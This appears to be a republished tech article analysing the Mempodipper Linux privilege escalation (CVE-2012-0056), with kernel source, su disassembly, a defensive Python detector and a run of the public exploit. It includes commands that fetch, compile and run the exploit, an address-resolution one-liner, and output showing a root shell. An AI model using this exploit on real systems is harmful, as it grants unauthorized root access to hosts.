2025-04-06 Update From: SLTechnology News&Howtos > Servers
Shulou(Shulou.com)06/01 Report--
This article walks through an example analysis of Linux local privilege escalation and the use of its EXP (exploit). It is quite detailed and has some reference value; interested readers should read it through.
Linux >= 2.6.39 Mempodipper Local Privilege Escalation Analysis and EXP Exploitation (CVE-2012-0056)
/proc/pid/mem is an interface for reading and writing a process's memory directly: an offset in the file corresponds to the same address in the process's virtual address space.
Affected: Linux kernel >= 2.6.39
When /proc/pid/mem is opened, this kernel code is invoked:
The code is as follows:
    static int mem_open(struct inode *inode, struct file *file)
    {
        /* Record the opener's self_exec_id; it is compared again on every write. */
        file->private_data = (void *)((long)current->self_exec_id);
        file->f_mode |= FMODE_UNSIGNED_OFFSET;
        return 0;
    }
Any process can open an fd on /proc/pid/mem of any other process for reading and writing, since open itself does no permission check; the restrictions are applied in the read and write paths. Let's look at the write function:
The code is as follows:
    static ssize_t mem_write(struct file *file, const char __user *buf,
                             size_t count, loff_t *ppos)
    {
        struct mm_struct *mm;
        int copied;
        struct task_struct *task = get_proc_task(file->f_path.dentry->d_inode);

        /* First check: may the writer access this task's memory at all? */
        mm = check_mem_permission(task);
        copied = PTR_ERR(mm);
        if (IS_ERR(mm))
            goto out_free;

        /* Second check: has the writer exec'd since the fd was opened? */
        if (file->private_data != (void *)((long)current->self_exec_id))
            goto out_mm;
        /* ... remainder of the function omitted ... */
There are two checks guarding against unauthorized writes: check_mem_permission and the self_exec_id comparison.
check_mem_permission simply calls __check_mem_permission:
    static struct mm_struct *__check_mem_permission(struct task_struct *task)
    {
        struct mm_struct *mm;

        mm = get_task_mm(task);
        if (!mm)
            return ERR_PTR(-EINVAL);

        /* A task may always write its own memory. */
        if (task == current)
            return mm;

        /* Otherwise the writer must be the ptrace parent of a stopped/traced task. */
        if (task_is_stopped_or_traced(task)) {
            int match;
            rcu_read_lock();
            match = (ptrace_parent(task) == current);
            rcu_read_unlock();
            if (match && ptrace_may_access(task, PTRACE_MODE_ATTACH))
                return mm;
        }

        mmput(mm);
        return ERR_PTR(-EPERM);
    }
From the code above there are two ways to obtain write access: task == current, or being the ptrace parent of a stopped or traced task.
The code is as follows:
$ su "hsmw fuck you"
Unknown id: hsmw fuck you
su prints "Unknown id: <argument>" to stderr. So if we open an fd on /proc/self/mem, seek it to the chosen location in memory, then dup2 the mem fd onto stderr, su will write its argument (our shellcode) into its own memory, and we get root.
Because su writes to its own memory, the task == current test passes; the remaining obstacle is the self_exec_id check, which compares the self_exec_id recorded when the fd was opened with the current one.
self_exec_id is referenced in only a few places in the kernel:
    void setup_new_exec(struct linux_binprm *bprm)
    {
        /* Every successful exec bumps the counter stored in the mem fd at open time. */
        current->self_exec_id++;
        flush_signal_handlers(current, 0);
        flush_old_files(current->files);
    }
    EXPORT_SYMBOL(setup_new_exec);
We fork a child process and have the child exec a new program; the exec increments the child's self_exec_id. When the parent later execs su, the parent's self_exec_id is incremented to the same value. So the child, after its exec, opens /proc/<parent-pid>/mem; the open succeeds because mem_open performs no permission check, and the fd records the child's already-incremented self_exec_id. The child then passes the open fd back to the parent; the parent dup2s it onto stderr and execs su with our shellcode as the argument. After that exec the parent's self_exec_id matches the value stored in the fd, so su's own write to stderr passes both checks and lands in its memory.
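As an added example that is not part of the original article, the following Python detector applies the sequence just described to constructed audit-style events (the key=value record format and the sample lines are assumptions, not real logs): it flags a process opening another process's /proc/<pid>/mem for writing, and raises the severity when the targeted process then executes a setuid binary such as su.

```python
import re

# Constructed audit-style events (not real logs), one per line, mirroring the
# sequence described above: a child opens its parent's /proc/<pid>/mem for
# writing, hands the fd back, the parent dup2s it onto stderr and execs su.
SAMPLE_EVENTS = """\
pid=6455 ppid=6454 comm=mempodipper syscall=open path=/proc/6454/mem flags=O_RDWR
pid=6455 ppid=6454 comm=mempodipper syscall=sendmsg fd=3 target=6454
pid=6454 ppid=6001 comm=mempodipper syscall=dup2 oldfd=5 newfd=2
pid=6454 ppid=6001 comm=mempodipper syscall=execve path=/bin/su setuid=1
pid=7001 ppid=7000 comm=gdb syscall=open path=/proc/7001/mem flags=O_RDWR
pid=7100 ppid=7099 comm=cat syscall=open path=/proc/7100/status flags=O_RDONLY
""".splitlines()

MEM_PATH = re.compile(r"^/proc/(\d+)/mem$")
KV = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn a 'key=value key=value' record into a dict (empty for blank lines)."""
    return dict(KV.findall(line))


def writable(flags):
    return "O_RDWR" in flags or "O_WRONLY" in flags


def analyse(lines):
    """Flag writable opens of another process's /proc/<pid>/mem, and escalate
    when the targeted process later execs a setuid binary (the su step)."""
    findings = []
    targets = {}  # target pid -> pid that holds a writable handle on its memory
    for line in lines:
        ev = parse_event(line)
        if not ev:
            continue
        pid = int(ev["pid"])
        call = ev.get("syscall")
        if call == "open":
            m = MEM_PATH.match(ev.get("path", ""))
            if m and int(m.group(1)) != pid and writable(ev.get("flags", "")):
                target = int(m.group(1))
                targets[target] = pid
                findings.append({"rule": "cross-process-mem-write-open",
                                 "severity": "medium", "opener": pid, "target": target})
        elif call == "execve" and ev.get("setuid") == "1" and pid in targets:
            findings.append({"rule": "setuid-exec-with-foreign-mem-handle",
                             "severity": "high", "opener": targets[pid],
                             "target": pid, "path": ev["path"]})
    return findings
```

A process opening its own /proc/self/mem (the gdb line) is deliberately not flagged, since that is the legitimate task == current case.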
Next, debug the address to overwrite, taking the ASLR-randomized process address space into account.
su first fetches the error string:
    403677: ba 05 00 00 00          mov    $0x5,%edx
    40367c: be ff 64 40 00          mov    $0x4064ff,%esi
    403681: 31 ff                   xor    %edi,%edi
    403683: e8 e0 ed ff ff          callq  402468 <dcgettext@plt>
Then writes it to stderr:
    403688: 48 8b 3d 59 51 20 00    mov    0x205159(%rip),%rdi   # 6087e8 <stderr>
    40368f: 48 89 c2                mov    %rax,%rdx
    403692: b9 20 88 60 00          mov    $0x608820,%ecx
    403697: be 01 00 00 00          mov    $0x1,%esi
    40369c: 31 c0                   xor    %eax,%eax
    40369e: e8 75 ea ff ff          callq  402118 <__fprintf_chk@plt>
Closes the log:
    4036a3: e8 f0 eb ff ff          callq  402298 <closelog@plt>
And exits the process:
    4036a8: bf 01 00 00 00          mov    $0x1,%edi
    4036ad: e8 c6 ea ff ff          callq  402178 <exit@plt>
Here you can see 0x402178, the exit@plt entry that su calls after printing "Unknown id:"; this is the address the shellcode write targets. It can be resolved from the binary directly:
    $ objdump -d /bin/su | grep '<exit@plt>' | head -n 1 | cut -d ' ' -f 1 | sed 's/^[0]*\([^0]*\)/0x\1/'
    0x402178
The shellcode sets uid and gid to 0 and executes a shell. Before dup2ing the mem fd onto stderr, the original stderr can also be saved so it can be restored afterwards:
we dup stderr to another fd first, and in the shellcode dup2 that fd back onto stderr.
The EXP was written by a foreign author; here is an excerpt of its use:
The code is as follows:
wget http://git.zx2c4.com/CVE-2012-0056/tree/mempodipper.c
CVE-2012-0056 $ ls
build-and-run-exploit.sh build-and-run-shellcode.sh mempodipper.c shellcode-32.s shellcode-64.s
CVE-2012-0056 $ gcc mempodipper.c -o mempodipper
CVE-2012-0056 $ ./mempodipper
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/6454/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x402178.
[+] Seeking to offset 0x40216c.
[+] Executing su with shellcode.
sh-4.2# whoami
root
sh-4.2#
The above is the full content of "Linux local privilege escalation and EXP exploitation example analysis"; thank you for reading! I hope the shared content helps everyone. For more related knowledge, please follow the industry information channel!